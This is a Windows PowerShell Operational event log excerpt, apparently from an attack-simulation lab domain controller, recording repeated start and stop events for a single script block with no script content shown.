OpCode=On create calls
RecordNumber=1475059
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475058
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475057
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475056
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475055
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475054
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475053
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475052
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475051
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475050
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475049
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475048
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475047
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475046
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475045
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475044
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475043
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475042
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475041
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475040
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475039
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475038
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475037
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475036
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475035
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475034
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475033
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475032
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475031
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475030
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475029
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475028
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475027
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475026
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475025
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475024
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475023
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475022
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475021
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475020
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475019
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475018
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475017
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475016
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475015
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475014
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475013
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475012
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475011
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475010
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475009
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475008
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475007
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475006
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475005
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
